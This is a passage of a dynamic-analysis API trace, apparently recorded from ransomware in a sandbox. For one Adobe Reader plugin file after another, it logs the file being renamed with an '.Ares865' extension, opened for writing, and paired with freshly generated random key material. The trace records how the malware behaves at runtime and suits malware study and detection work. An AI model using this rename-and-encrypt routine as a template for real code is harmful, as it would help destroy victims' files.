[0173.159] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.dan.ares865"), dwFlags=0x1) returned 1 [0173.161] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.161] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.161] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.162] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.162] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.165] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.165] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.166] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.DEU" | out: lpString1="Mcimpp.DEU") returned="Mcimpp.DEU" [0173.166] lstrlenW (lpString="Mcimpp.DEU") returned 10 [0173.166] lstrlenW (lpString="Ares865") returned 7 [0173.166] lstrcmpiW (lpString1="mpp.DEU", lpString2="Ares865") returned 1 [0173.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DEU.Ares865") returned 90 [0173.166] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.deu.ares865"), dwFlags=0x1) returned 1 [0173.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.171] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.172] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.ESP" | out: lpString1="Mcimpp.ESP") returned="Mcimpp.ESP" [0173.172] lstrlenW (lpString="Mcimpp.ESP") returned 10 [0173.173] lstrlenW (lpString="Ares865") returned 7 [0173.173] lstrcmpiW (lpString1="mpp.ESP", lpString2="Ares865") returned 1 [0173.173] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ESP.Ares865") returned 90 [0173.173] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.esp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.esp.ares865"), dwFlags=0x1) returned 1 [0173.175] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.175] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.175] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.176] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.176] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.179] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.179] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.179] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.180] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.EUQ" | out: lpString1="Mcimpp.EUQ") returned="Mcimpp.EUQ" [0173.180] lstrlenW (lpString="Mcimpp.EUQ") returned 10 [0173.180] lstrlenW (lpString="Ares865") returned 7 [0173.180] lstrcmpiW (lpString1="mpp.EUQ", lpString2="Ares865") returned 1 [0173.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.EUQ.Ares865") returned 90 [0173.181] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.euq"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.euq.ares865"), dwFlags=0x1) returned 1 [0173.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.183] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.184] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.184] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.186] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.188] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.FRA" | out: lpString1="Mcimpp.FRA") returned="Mcimpp.FRA" [0173.188] lstrlenW (lpString="Mcimpp.FRA") returned 10 [0173.188] lstrlenW (lpString="Ares865") returned 7 [0173.188] lstrcmpiW (lpString1="mpp.FRA", lpString2="Ares865") returned 1 [0173.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.FRA.Ares865") returned 90 [0173.188] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.fra"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.fra.ares865"), dwFlags=0x1) returned 1 [0173.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.190] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.190] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.191] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.191] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.194] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.195] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.ITA" | out: lpString1="Mcimpp.ITA") returned="Mcimpp.ITA" [0173.195] lstrlenW (lpString="Mcimpp.ITA") returned 10 [0173.195] lstrlenW (lpString="Ares865") returned 7 [0173.195] lstrcmpiW (lpString1="mpp.ITA", lpString2="Ares865") returned 1 [0173.195] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ITA.Ares865") returned 90 [0173.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ita"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ita.ares865"), dwFlags=0x1) returned 1 [0173.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.197] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.198] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.202] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.JPN" | out: lpString1="Mcimpp.JPN") returned="Mcimpp.JPN" [0173.202] lstrlenW (lpString="Mcimpp.JPN") returned 10 [0173.202] lstrlenW (lpString="Ares865") returned 7 [0173.202] lstrcmpiW (lpString1="mpp.JPN", lpString2="Ares865") returned 1 [0173.203] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.JPN.Ares865") returned 90 [0173.203] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.jpn"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.jpn.ares865"), dwFlags=0x1) returned 1 [0173.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0173.205] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.206] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.208] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.209] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.KOR" | out: lpString1="Mcimpp.KOR") returned="Mcimpp.KOR" [0173.209] lstrlenW (lpString="Mcimpp.KOR") returned 10 [0173.209] lstrlenW (lpString="Ares865") returned 7 [0173.209] lstrcmpiW (lpString1="mpp.KOR", lpString2="Ares865") returned 1 [0173.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.KOR.Ares865") returned 90 [0173.210] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.kor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.kor.ares865"), dwFlags=0x1) returned 1 [0173.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0173.212] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.215] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.216] lstrcpyW (in: lpString1=0x2cce490, lpString2="MCIMPP.mpp" | out: lpString1="MCIMPP.mpp") returned="MCIMPP.mpp" [0173.216] lstrlenW (lpString="MCIMPP.mpp") returned 10 [0173.216] lstrlenW (lpString="Ares865") returned 7 [0173.216] lstrcmpiW (lpString1="MPP.mpp", lpString2="Ares865") returned 1 [0173.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp.Ares865") returned 90 [0173.217] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.mpp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.mpp.ares865"), dwFlags=0x1) returned 1 [0173.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.mpp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93696) returned 1 [0173.219] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.219] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.219] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.228] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.NLD" | out: lpString1="Mcimpp.NLD") returned="Mcimpp.NLD" [0173.228] lstrlenW (lpString="Mcimpp.NLD") returned 10 [0173.228] lstrlenW (lpString="Ares865") returned 7 [0173.228] lstrcmpiW (lpString1="mpp.NLD", lpString2="Ares865") returned 1 [0173.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NLD.Ares865") returned 90 [0173.229] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nld"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nld.ares865"), dwFlags=0x1) returned 1 [0173.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.232] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.233] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.233] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.236] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.237] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.237] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.238] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.NOR" | out: lpString1="Mcimpp.NOR") returned="Mcimpp.NOR" [0173.238] lstrlenW (lpString="Mcimpp.NOR") returned 10 [0173.238] lstrlenW (lpString="Ares865") returned 7 [0173.238] lstrcmpiW (lpString1="mpp.NOR", lpString2="Ares865") returned 1 [0173.238] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NOR.Ares865") returned 90 [0173.238] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nor.ares865"), dwFlags=0x1) returned 1 [0173.240] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.240] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7680) returned 1 [0173.240] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.243] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.244] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.244] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.245] lstrcpyW (in: lpString1=0x2cce490, lpString2="MCIMPP.PTB" | out: lpString1="MCIMPP.PTB") returned="MCIMPP.PTB" [0173.245] lstrlenW (lpString="MCIMPP.PTB") returned 10 [0173.245] lstrlenW (lpString="Ares865") returned 7 [0173.245] lstrcmpiW (lpString1="MPP.PTB", lpString2="Ares865") returned 1 [0173.245] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.PTB.Ares865") returned 90 [0173.245] MoveFileExW (lpExistingFileName="C:\\Program Files 